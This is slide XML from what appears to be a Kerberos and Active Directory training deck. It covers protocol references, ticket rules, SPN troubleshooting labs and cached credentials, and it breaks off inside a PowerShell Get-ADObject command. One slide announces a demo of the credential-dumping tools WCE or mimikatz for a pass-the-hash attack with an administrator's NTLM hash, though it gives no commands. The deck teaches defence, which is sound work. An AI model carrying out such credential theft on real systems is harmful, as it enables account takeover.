            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>MS-KILE – Kerberos Protocol Extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>MS-SFU – Service for User Extensions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>RFC4120 – latest MIT Kerberos implementations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>RFC1964 - The Kerberos Version 5 GSS-API Mechanism</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>RFC4757 – RC4-HMAC encryption type</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This content is based on...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304387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Summary of Advantages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3693319"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos offers many advantages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mature IETF standard for interoperability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Transitive trusts between realms / domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mutual authentication of client and server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Faster connection authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delegation of authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ubiquity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure communication through session keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Durability and Reusability: Ticket Lifetime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Support for smart card logon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why Kerberos?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100378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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="45" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="46" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="10000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="1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Breakdown of the Kerberos Message Flow</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="2846933"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passwords / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Password Hashes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are never sent over the wire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user credentials in a ticket is only a SID list</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Symmetric Encryption with exchangeable encryption types</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>KDC always provides a session key to a ticket (session key also in the ticket)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All tickets are encrypted with the target account’s password</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using a ticket always requires an authenticator (encrypted with the session key)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Kerberos Golden Rules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340595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Credentials on unsecure machines are dangerous</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="4093428"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos never uses the password when remotely connecting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM does neither</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The following list of authentication types stores the password hash in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interactive logon sessions at the console </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote logon sessions via RDP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RunAs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Services running under specific user accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scheduled tasks running under specific user accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows APIs used by applications, like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LogonUser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Being able to read password hashes by untrusted people is critical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pass-The-Hash Technique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.securityfocus.com/bid/233/discuss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions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280" y="-459647"/>
            <a:ext cx="2149267" cy="2149267"/>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636584962"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7596336" y="4817715"/>
          <a:ext cx="914400" cy="771525"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj name="Acrobat Document" showAsIcon="1" r:id="rId5" imgW="914400" imgH="771480" progId="AcroExch.Document.DC">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" showAsIcon="1" r:id="rId5" imgW="914400" imgH="771480" progId="AcroExch.Document.DC">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="7" name="Object 6"/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId6"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="7596336" y="481771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20229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a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo: WCE or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="615553"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pass the hash attack by re-using the administrator’s</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM password hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions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459647"/>
            <a:ext cx="2149267" cy="2149267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372795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Lab 4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Troubleshooting SPNs Part 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See the document “Kerberos Lab Instructions”</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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459647"/>
            <a:ext cx="2149267" cy="2149267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171164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a:t>Lab 5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Troubleshooting SPNs Part 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See the document “Kerberos Lab Instructions”</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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459647"/>
            <a:ext cx="2149267" cy="2149267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386404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de-DE" dirty="0"/>
              <a:t>Summary on SPNs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3339376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SPNs enable the KDC to find the right password to encrypt the service ticket with.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos does not work when the SPN is missing. Authentication falls back to NTLM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos does not work if the SPN is registered on the wrong account. There will be no fallback and the authentication does not work at all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not all SPNs can be found in Active Directory. This is due to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SPNMappings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atrribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: This attribute maps 53 services (Windows 2012 R2) to the host SPN.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a client requests a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cifs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SPN which does not exist, it is mapped to host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="274692" y="4581128"/>
            <a:ext cx="8643998" cy="1756710"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7097"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274692" y="4639144"/>
            <a:ext cx="1284270" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1416980" y="4654311"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1274824" y="4609646"/>
            <a:ext cx="7643866" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-ADObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -Identity 'CN=Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Service,CN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
